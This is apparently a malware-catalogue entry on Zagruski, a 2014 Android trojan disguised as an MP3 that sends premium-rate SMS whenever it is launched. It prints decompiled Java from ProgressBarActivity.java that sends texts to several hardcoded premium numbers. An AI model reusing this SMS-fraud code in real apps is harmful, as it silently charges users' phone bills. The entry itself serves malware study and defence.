Zagruski

2014-06-19

Summary

Premium SMS sending

GroDDViewer graphs:

Details

Zagruski is a malware discovered in 2014. The malware looks like an MP3 file and sends overcharged SMS each time the APK is launched.

Stage 1: Malicious code execution

Zagruski does not disturb the androïd OS when once set up. The overcharged SMS are sent once each time the application is launched.

Stage 2: SMS sending

Despite the fact that the overcharged numbers are hardcoded inside the APK, it is not possible to track their destination.

Other resources

Triggering

To trigger the malware, launch the application.

Caracteristics

Malware type :

Attacks :

  •   Normal use

Infection technique :

Malicious code type :

Hidding techniques :

Triggering techniques :

Samples

Java source code extracts:

ProgressBarActivity.java is the service started when the application is launched.

ProgressBarActivity.java

  public void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    setContentView(2130903040);
    if (new File("data/data/com.agewap.soft/files", "file.lock").exists()) {
      System.exit(0);
    }
    try
    {
      paramBundle = new OutputStreamWriter(openFileOutput("file.lock", 1));
      paramBundle.flush();
      paramBundle.close();
      paramBundle = SmsManager.getDefault();
      paramBundle.sendTextMessage("5373", null, "604+bigs 280 ajGEIk47Y", null, null);
      paramBundle.sendTextMessage("7250", null, "604+bigs 280 ajGEIk47Y", null, null);
      paramBundle.sendTextMessage("7250", null, "604+bigs 280 ajGEIk47Y", null, null);
      paramBundle.sendTextMessage("7099", null, "604+bigs 280 ajGEIk47Y", null, null);
      paramBundle.sendTextMessage("7030", null, "604+bigs 280 ajGEIk47Y", null, null);
      this.mProgressBar = ((ProgressBar)findViewById(2131034113));
      this.mHandler = new Handler()
      {
        public void handleMessage(Message paramAnonymousMessage)
        {
          ProgressBarActivity.this.mProgressBar.incrementProgressBy(1);
        }
      };
      super.onStart();
      if (this.mProgressBar.getProgress() == 100) {
        System.exit(0);
      }
      return;
}

Samples